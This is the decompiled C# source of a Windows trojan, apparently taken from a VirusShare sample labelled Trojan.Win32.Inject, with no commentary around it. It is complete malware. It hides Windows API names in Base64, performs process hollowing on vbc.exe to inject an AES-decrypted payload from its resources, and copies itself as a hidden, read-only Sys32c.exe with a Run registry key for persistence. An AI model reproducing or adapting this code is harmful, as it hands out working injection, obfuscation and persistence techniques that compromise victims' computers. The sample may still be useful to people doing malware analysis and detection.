// Decompiled with JetBrains decompiler
// Type: Program.Main
// Assembly: Decrypting Fix, Version=6.1.7600.16385, Culture=neutral, PublicKeyToken=null
// MVID: 5EC331FA-B6C2-444A-898D-1B8B7F0DD4AE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Inject.bvqp-82e6872a62164069321f9add60821c490a425ee1ff065a7296986c3fb2473a9f.exe

using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32.SafeHandles;
using My;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Runtime.CompilerServices;
using System.Runtime.ConstrainedExecution;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using System.Windows.Forms;

namespace Program
{
  public class Main : Form
  {
    private IContainer Components;
    private const string q4VJ3UxL2Hj9tVz2wT = "kernel32";

    [STAThread]
    public static void Main() => Application.Run((Form) new Program.Main());

    public Main()
    {
      this.Load += new EventHandler(this.Main_Load);
      Application.EnableVisualStyles();
      this.InitializeComponent();
      this.SuspendLayout();
      this.AutoScaleDimensions = new SizeF(6f, 13f);
      this.AutoScaleMode = AutoScaleMode.Font;
      this.ClientSize = new Size(1, 1);
      this.Opacity = 0.0;
      this.ShowInTaskbar = false;
      this.Name = nameof (Main);
      this.Text = nameof (Main);
      this.ResumeLayout(false);
      this.PerformLayout();
    }

    protected override void Dispose(bool Disposing)
    {
      if (Disposing && this.Components != null)
        this.Components.Dispose();
      base.Dispose(Disposing);
    }

    [DebuggerStepThrough]
    private void InitializeComponent()
    {
    }

    [DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true, BestFitMapping = false)]
    public static extern Program.Main.qRTN9lUpullIj6GUh LoadLibrary(string qRTN9lUpullIj6GUh);

    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(
      Program.Main.qRTN9lUpullIj6GUh qhEbZGm2H8ZnH42HR,
      string qCLRHRrHOXv2JxQNyFE);

    public T q2wRmsfiDJ8WoDorwrT<T>(string qRgQq5TmqXow75lyuU, string qTt3E6FjNzOQO1IVq54z) => (T) Marshal.GetDelegateForFunctionPointer(Program.Main.GetProcAddress(Program.Main.LoadLibrary(qRgQq5TmqXow75lyuU), qTt3E6FjNzOQO1IVq54z), typeof (T));

    public bool qod7iE7xbZivMdsc27FyN(byte[] qutBjatOQGsHGrnZrJMh, string qOgUFl9aN9Ozcfheoo)
    {
      Program.Main.qK5eLdqzmCYTmerrjty k5eLdqzmCyTmerrjty = this.q2wRmsfiDJ8WoDorwrT<Program.Main.qK5eLdqzmCYTmerrjty>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("Q3JlYXRlUHJvY2Vzc0E=")));
      Program.Main.qpu7UEEIb1NNCzbBPjE qpu7UeeIb1NnCzbBpjE = this.q2wRmsfiDJ8WoDorwrT<Program.Main.qpu7UEEIb1NNCzbBPjE>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("R2V0VGhyZWFkQ29udGV4dA==")));
      Program.Main.qVK7EbJcVZNQviBk2nD vk7EbJcVznQviBk2nD = this.q2wRmsfiDJ8WoDorwrT<Program.Main.qVK7EbJcVZNQviBk2nD>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("UmVhZFByb2Nlc3NNZW1vcnk=")));
      Program.Main.qyuBnubPQitzQwFVMpH1 bnubPqitzQwFvMpH1 = this.q2wRmsfiDJ8WoDorwrT<Program.Main.qyuBnubPQitzQwFVMpH1>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("VmlydHVhbEFsbG9jRXg=")));
      Program.Main.q1FykcnusJynatl87SgQ fykcnusJynatl87SgQ = this.q2wRmsfiDJ8WoDorwrT<Program.Main.q1FykcnusJynatl87SgQ>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("V3JpdGVQcm9jZXNzTWVtb3J5")));
      Program.Main.qyLl34wgTMSMCFLkuoX ll34wgTmsmcfLkuoX = this.q2wRmsfiDJ8WoDorwrT<Program.Main.qyLl34wgTMSMCFLkuoX>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("U2V0VGhyZWFkQ29udGV4dA==")));
      Program.Main.qjgLmnnKy8isUYejVoUfc lmnnKy8isUyejVoUfc = this.q2wRmsfiDJ8WoDorwrT<Program.Main.qjgLmnnKy8isUYejVoUfc>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("UmVzdW1lVGhyZWFk")));
      Program.Main.qGrlH13erjwuO8Ium8y1t h13erjwuO8Ium8y1t = this.q2wRmsfiDJ8WoDorwrT<Program.Main.qGrlH13erjwuO8Ium8y1t>(Encoding.UTF8.GetString(Convert.FromBase64String("bnRkbGw=")), Encoding.UTF8.GetString(Convert.FromBase64String("WndVbm1hcFZpZXdPZlNlY3Rpb24=")));
      bool flag;
      try
      {
        IntPtr zero1 = IntPtr.Zero;
        IntPtr[] qIadr6hocYeSQqHaF = new IntPtr[4];
        byte[] qmnfIw7BIwOHrrKSmLdoW = new byte[68];
        int int32_1 = BitConverter.ToInt32(qutBjatOQGsHGrnZrJMh, 60);
        int int16 = (int) BitConverter.ToInt16(qutBjatOQGsHGrnZrJMh, checked (int32_1 + 6));
        IntPtr qt3C7UZF1LBmvmLls5cK = new IntPtr(BitConverter.ToInt32(qutBjatOQGsHGrnZrJMh, checked (int32_1 + 84)));
        if (k5eLdqzmCyTmerrjty((string) null, new StringBuilder(qOgUFl9aN9Ozcfheoo), zero1, zero1, false, 4, zero1, (string) null, qmnfIw7BIwOHrrKSmLdoW, qIadr6hocYeSQqHaF))
        {
          uint[] numArray1 = new uint[179];
          numArray1[0] = 65538U;
          if (qpu7UeeIb1NnCzbBpjE(qIadr6hocYeSQqHaF[1], numArray1))
          {
            IntPtr qkD4wxFJEaTcgyH8vkU = new IntPtr(checked ((long) numArray1[41] + 8L));
            IntPtr zero2 = IntPtr.Zero;
            IntPtr qP117M8hA2NaWe7f77D = new IntPtr(4);
            IntPtr zero3 = IntPtr.Zero;
            if (vk7EbJcVznQviBk2nD(qIadr6hocYeSQqHaF[0], qkD4wxFJEaTcgyH8vkU, ref zero2, (int) qP117M8hA2NaWe7f77D, ref zero3) && h13erjwuO8Ium8y1t(qIadr6hocYeSQqHaF[0], zero2) == 0U)
            {
              IntPtr num1 = new IntPtr(BitConverter.ToInt32(qutBjatOQGsHGrnZrJMh, checked (int32_1 + 52)));
              IntPtr num2 = new IntPtr(BitConverter.ToInt32(qutBjatOQGsHGrnZrJMh, checked (int32_1 + 80)));
              IntPtr qjPIGVcpPXDEKLJbthX = bnubPqitzQwFvMpH1(qIadr6hocYeSQqHaF[0], num1, num2, 12288, 64);
              int int32_2 = qjPIGVcpPXDEKLJbthX.ToInt32();
              int qILqBydH6XFqpsca2ULHe;
              int num3 = fykcnusJynatl87SgQ(qIadr6hocYeSQqHaF[0], qjPIGVcpPXDEKLJbthX, qutBjatOQGsHGrnZrJMh, checked ((uint) (int) qt3C7UZF1LBmvmLls5cK), qILqBydH6XFqpsca2ULHe) ? 1 : 0;
              int num4 = checked (int16 - 1);
              int num5 = 0;
              while (num5 <= num4)
              {
                int[] dst = new int[10];
                Buffer.BlockCopy((Array) qutBjatOQGsHGrnZrJMh, checked (int32_1 + 248 + num5 * 40), (Array) dst, 0, 40);
                byte[] numArray2 = new byte[checked (dst[4] - 1 + 1)];
                Buffer.BlockCopy((Array) qutBjatOQGsHGrnZrJMh, dst[5], (Array) numArray2, 0, numArray2.Length);
                num2 = new IntPtr(checked (int32_2 + dst[3]));
                num1 = new IntPtr(numArray2.Length);
                int num6 = fykcnusJynatl87SgQ(qIadr6hocYeSQqHaF[0], num2, numArray2, checked ((uint) (int) num1), qILqBydH6XFqpsca2ULHe) ? 1 : 0;
                checked { ++num5; }
              }
              num2 = new IntPtr(checked ((long) numArray1[41] + 8L));
              num1 = new IntPtr(4);
              int num7 = fykcnusJynatl87SgQ(qIadr6hocYeSQqHaF[0], num2, BitConverter.GetBytes(qjPIGVcpPXDEKLJbthX.ToInt32()), checked ((uint) (int) num1), qILqBydH6XFqpsca2ULHe) ? 1 : 0;
              numArray1[44] = checked ((uint) (qjPIGVcpPXDEKLJbthX.ToInt32() + BitConverter.ToInt32(qutBjatOQGsHGrnZrJMh, int32_1 + 40)));
              int num8 = ll34wgTmsmcfLkuoX(qIadr6hocYeSQqHaF[1], numArray1) ? 1 : 0;
            }
          }
          int num = (int) lmnnKy8isUyejVoUfc(qIadr6hocYeSQqHaF[1]);
        }
      }
      catch (Exception ex)
      {
        ProjectData.SetProjectError(ex);
        flag = false;
        ProjectData.ClearProjectError();
        goto label_11;
      }
      flag = true;
label_11:
      return flag;
    }

    private void Main_Load(object sender, EventArgs e)
    {
      RuntimeHelpers.GetObjectValue(My.Resources.Resources.ResourceManager.GetObject("qPEldicfv5EC3Gb8WccKM"));
      this.qod7iE7xbZivMdsc27FyN(this.qcY2cSqjQOEnNyB8BR(My.Resources.Resources.qPEldicfv5EC3Gb8WccKM), Encoding.UTF8.GetString(Convert.FromBase64String("QzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29ya1x2Mi4wLjUwNzI3XHZiYy5leGU=")));
      try
      {
        string str = Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData) + "\\Sys32c.exe";
        if (!MyProject.Computer.FileSystem.FileExists(str))
        {
          MyProject.Computer.FileSystem.CopyFile(Application.ExecutablePath, str);
          MyProject.Computer.Registry.SetValue(Encoding.UTF8.GetString(Convert.FromBase64String("SEtFWV9DVVJSRU5UX1VTRVJcU29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu")), "DefaultSystem", (object) str);
          FileInfo fileInfo = MyProject.Computer.FileSystem.GetFileInfo(str);
          fileInfo.IsReadOnly = true;
          fileInfo.Attributes |= FileAttributes.Hidden;
        }
      }
      catch (Exception ex)
      {
        ProjectData.SetProjectError(ex);
        ProjectData.ClearProjectError();
      }
      this.Close();
    }

    public byte[] qcY2cSqjQOEnNyB8BR(byte[] qVwWsMfhGAWEi5KvwpG)
    {
      using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
      {
        rijndaelManaged.IV = new byte[16]
        {
          (byte) 171,
          (byte) 242,
          (byte) 129,
          (byte) 120,
          (byte) 87,
          (byte) 84,
          (byte) 55,
          (byte) 143,
          (byte) 127,
          (byte) 97,
          (byte) 129,
          (byte) 71,
          (byte) 232,
          (byte) 183,
          (byte) 126,
          (byte) 29
        };
        rijndaelManaged.Key = new byte[16]
        {
          (byte) 29,
          (byte) 126,
          (byte) 183,
          (byte) 232,
          (byte) 71,
          (byte) 129,
          (byte) 97,
          (byte) 127,
          (byte) 143,
          (byte) 55,
          (byte) 84,
          (byte) 87,
          (byte) 120,
          (byte) 129,
          (byte) 242,
          (byte) 171
        };
        return rijndaelManaged.CreateDecryptor().TransformFinalBlock(qVwWsMfhGAWEi5KvwpG, 0, qVwWsMfhGAWEi5KvwpG.Length);
      }
    }

    public sealed class qRTN9lUpullIj6GUh : SafeHandleZeroOrMinusOneIsInvalid
    {
      private qRTN9lUpullIj6GUh()
        : base(true)
      {
      }

      protected override bool ReleaseHandle() => Program.Main.qSuwkqfclcYh5UpnG.FreeLibrary(this.handle);
    }

    [return: MarshalAs(UnmanagedType.Bool)]
    public delegate bool qK5eLdqzmCYTmerrjty(
      string qRgQq5TmqXow75lyuU,
      StringBuilder qbcEbU7rMvcsrxe3UfH,
      IntPtr qTt3E6FjNzOQO1IVq54z,
      IntPtr qR7zirBJB9tbtFlemR3Z,
      [MarshalAs(UnmanagedType.Bool)] bool qhi7j6CyTUe8Si7lI9Xn,
      int q6ENwac4IZbZencEv,
      IntPtr qBskTdk7zX6JqTmKRbVVl,
      string quP1X9oZ6fCT6IaPiDYa1,
      byte[] qmnfIw7BIwOHrrKSmLdoW,
      IntPtr[] qIadr6hocYeSQqHaF);

    public delegate bool q1FykcnusJynatl87SgQ(
      IntPtr qYHiiijjxQIiXT9rTD,
      IntPtr qjPIGVcpPXDEKLJbthX,
      byte[] qJfIPq6CUMbtHKrLIs,
      uint qt3C7UZF1LBmvmLls5cK,
      int qILqBydH6XFqpsca2ULHe);

    [return: MarshalAs(UnmanagedType.Bool)]
    public delegate bool qVK7EbJcVZNQviBk2nD(
      IntPtr qS5ZIQwRANdTpNyTLP,
      IntPtr qkD4wxFJEaTcgyH8vkU,
      ref IntPtr qDRGjGAgqVI9O6nt8qQ,
      int qP117M8hA2NaWe7f77D,
      ref IntPtr qgQuF44s6nNhK76J6F);

    public delegate IntPtr qyuBnubPQitzQwFVMpH1(
      IntPtr qgKtQSSPpjGZPbYLXHg,
      IntPtr qJpnTY3YBIic8GBgswb,
      IntPtr qsAYUzRMLvVLHofKIQNfy,
      int q1Bew5H1CpIKvMeM6Dl,
      int q3avwBWdX7hBcVtlx);

    public delegate uint qGrlH13erjwuO8Ium8y1t(
      IntPtr q8baWCaFMTPwgN6SK4,
      IntPtr qws4HXjQQZ6vytG9ZhF);

    public delegate uint qjgLmnnKy8isUYejVoUfc(IntPtr qZBkmqcsDu7ALWuxFsaR);

    [return: MarshalAs(UnmanagedType.Bool)]
    public delegate bool qpu7UEEIb1NNCzbBPjE(
      IntPtr q8aJbsdB3RE7K3IemC,
      uint[] qgwTtKHdkZrSrwWXUf7YC);

    [return: MarshalAs(UnmanagedType.Bool)]
    public delegate bool qyLl34wgTMSMCFLkuoX(
      IntPtr q7eGeMCDidTxqOaWBt,
      uint[] qmYWjBfxHvovyYUEQNEph);

    public sealed class qSuwkqfclcYh5UpnG
    {
      private const string qyZwDbaHtRhHvobT4Jwdt = "kernel32";

      [ReliabilityContract(Consistency.WillNotCorruptState, Cer.Success)]
      [DllImport("kernel32", SetLastError = true)]
      [return: MarshalAs(UnmanagedType.Bool)]
      public static extern bool FreeLibrary(IntPtr qqI56ettNvDsxSFeCqpVt);
    }
  }
}